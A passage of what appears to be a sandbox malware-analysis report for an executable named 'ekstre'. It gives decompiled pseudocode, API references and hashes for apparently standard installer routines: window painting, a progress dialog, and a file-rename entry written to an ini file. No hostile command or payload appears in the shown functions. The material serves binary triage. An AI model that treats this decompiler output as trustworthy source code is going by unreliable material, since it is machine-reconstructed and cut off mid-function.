SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
GetDlgItem.USER32(?,0000040A), ref: 004048FF
SendMessageW.USER32(00000000), ref: 00404906
GetDlgItem.USER32(?,000003E8), ref: 00404931
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
LoadCursorW.USER32(00000000,00007F02), ref: 00404982
SetCursor.USER32(00000000), ref: 00404985
LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
SetCursor.USER32(00000000), ref: 004049A1
SendMessageW.USER32(00000111,?,00000000), ref: 004049D0
SendMessageW.USER32(?,00000000,00000000), ref: 004049E2

Strings

Call, xrefs: 00404960
N, xrefs: 0040491F

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 4782b9b4eda84373534ba60df76701eed62442430a03cc08abb51f4845f57d20
Instruction ID: 2e63217677652f59b4b2df67e99a4f785984152936c7793f9fd668dd7aaa3dc2
Opcode Fuzzy Hash: 4782b9b4eda84373534ba60df76701eed62442430a03cc08abb51f4845f57d20
Instruction Fuzzy Hash: 8D618DF1900209BFDB10AF61DD85A6A7B69FB44304F00813AF705B62D1CB78AD51DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x470270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, "true");
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x468260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x470268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00468260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 859ad4d5c908954c302fd5f6e87201aa3f7da17d0dd271069c6d7a5b51f09617
Instruction ID: c62f1c1f376d9ee0d7800d9465679141f30c6f5e77cc96b9ae53903d71277972
Opcode Fuzzy Hash: 859ad4d5c908954c302fd5f6e87201aa3f7da17d0dd271069c6d7a5b51f09617
Instruction Fuzzy Hash: DD418B72800209EFCF058FA5CE459AF7BB9FF45315F00802AF991AA1A0CB349A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004062AE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x45ede8 = 0x55004e;
				 *0x45edec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x45f5e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x45e9e8, "%ls=%ls\r\n", 0x45ede8, 0x45f5e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x45f5e8, 0x45f5e8,  *((intOrPtr*)( *0x470270 + 0x128)));
						_t12 = E00406158(0x45f5e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x45e9e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, "true"));
					_t12 = GetShortPathNameW(_t44, 0x45ede8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x004062ae
0x004062b7
0x004062be
0x004062c8
0x004062dc
0x00406304
0x0040630f
0x00406313
0x00406333
0x0040633a
0x00406344
0x00406351
0x00406356
0x0040635b
0x0040635f
0x0040636e
0x00406370
0x0040637d
0x00406381
0x0040641c
0x00000000
0x00406397
0x004063a4
0x004063c8
0x004063cc
0x004063eb
0x004063ef
0x004063ef
0x004063f1
0x004063fa
0x00406405
0x00406410
0x00406416
0x00000000
0x00406416
0x004063ce
0x004063d1
0x004063dc
0x004063d8
0x004063da
0x004063db
0x004063db
0x004063e3
0x004063e5
0x00000000
0x004063e5
0x004063af
0x004063b5
0x00000000
0x004063b5
0x00406381
0x0040635f
0x004062de
0x004062e9
0x004062f2
0x004062f6
0x00000000
0x00000000
0x004062f6
0x00406427

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406449,?,?), ref: 004062E9
GetShortPathNameW.KERNEL32(?,0045EDE8,00000400), ref: 004062F2

Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

GetShortPathNameW.KERNEL32(?,0045F5E8,00000400), ref: 0040630F
wsprintfA.USER32 ref: 0040632D
GetFileSize.KERNEL32(00000000,00000000,0045F5E8,C0000000,00000004,0045F5E8,?,?,?,?,?), ref: 00406368
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,0045E9E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
GlobalFree.KERNEL32(00000000), ref: 00406416
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,004DD000,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040617E

Strings

[Rename], xrefs: 00406397, 004063A9
E, xrefs: 004062D7
%ls=%ls, xrefs: 00406323

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$E
API String ID: 2171350718-3393067000
Opcode ID: 96ef83b9170a865a5eb3b19a585758a46a32d6a0681c1ff1afe85a7ee5a2d144
Instruction ID: 42b546fa1c951d9ababbdf363c054459f9c5d3fee4263add73be13c6f7e09851
Opcode Fuzzy Hash: 96ef83b9170a865a5eb3b19a585758a46a32d6a0681c1ff1afe85a7ee5a2d144
Instruction Fuzzy Hash: 66314531100315BBD2206B619D48F5B3AACEF85705F16003AFE02FA2C3EA7CD92586BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040463d
0x004046f3
0x00000000
0x004046f3
0x0040464e
0x00404652
0x00000000
0x0040466c
0x0040466c
0x00404675
0x00000000
0x00000000
0x00404677
0x00404683
0x00404686
0x00404686
0x0040468c
0x00404692
0x00404692
0x0040469e
0x004046a4
0x004046ab
0x004046ae
0x004046b1
0x004046b3
0x004046b3
0x004046bb
0x004046c1
0x004046c1
0x004046cb
0x004046d0
0x004046d3
0x004046d8
0x004046db
0x004046db
0x004046eb
0x004046eb
0x00000000
0x004046ee

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404648
GetSysColor.USER32(00000000), ref: 00404686
SetTextColor.GDI32(?,00000000), ref: 00404692
SetBkMode.GDI32(?,?), ref: 0040469E
GetSysColor.USER32(?), ref: 004046B1
SetBkColor.GDI32(?,?), ref: 004046C1
DeleteObject.GDI32(?), ref: 004046DB
CreateBrushIndirect.GDI32(?), ref: 004046E5

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x4326fc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x4326fc = 0;
					return _t15;
				}
				__eflags =  *0x4326fc; // 0x0
				if(__eflags != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x47026c;
				if(_t6 >  *0x47026c) {
					__eflags =  *0x470268;
					if( *0x470268 == 0) {
						_t7 = CreateDialogParamW( *0x470260, 0x6f, 0, E00402F93, 0);
						 *0x4326fc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x470314 & 0x00000001;
					if(( *0x470314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}

0x0040303d
0x0040303f
0x00403046
0x00403049
0x00403049
0x0040304f
0x00000000
0x0040304f
0x00403057
0x0040305d
0x00000000
0x00403060
0x00403067
0x0040306d
0x00403073
0x00403075
0x0040307b
0x004030b9
0x004030c2
0x00000000
0x004030c7
0x0040307d
0x00403084
0x00403095
0x00000000
0x004030a3
0x00403084
0x004030cf

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00403049
GetTickCount.KERNEL32 ref: 00403067
wsprintfW.USER32 ref: 00403095

Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
ShowWindow.USER32(00000000,00000005), ref: 004030C7

Part of subcall function 00403012: MulDiv.KERNEL32(00023D44,00000064,00025783), ref: 00403027

Strings

... %d%%, xrefs: 0040308F

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: ed3ab73b42353b6f31644c418d0ae94dce20ee6eeead6efac5e8f67e54d77093
Instruction ID: d0b0674b86f3708cac1fb91578ec3f8672b393e5989b1c53146f6732e99da21d
Opcode Fuzzy Hash: ed3ab73b42353b6f31644c418d0ae94dce20ee6eeead6efac5e8f67e54d77093
Instruction Fuzzy Hash: 6501A170413614EBC721BF60AE09E6A3F6CAB00B06F10417BF445B11E9DA784A44DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404f8d
0x00404f9a
0x00404fa0
0x00404fde
0x00404fde
0x00404fed
0x00404ff4
0x00000000
0x00404ff6
0x00404fa2
0x00404fb1
0x00404fb9
0x00404fbc
0x00404fce
0x00404fd4
0x00404fdb
0x00000000
0x00404fdb
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
GetMessagePos.USER32 ref: 00404FA2
ScreenToClient.USER32(?,?), ref: 00404FBC
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4

Strings

f, xrefs: 00404FD0

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x41e5f8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x41e608 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x41e60f = 1;
				 *0x41e60c = _t15 & 0x00000001;
				 *0x41e60d = _t15 & 0x00000002;
				 *0x41e60e = _t15 & 0x00000004;
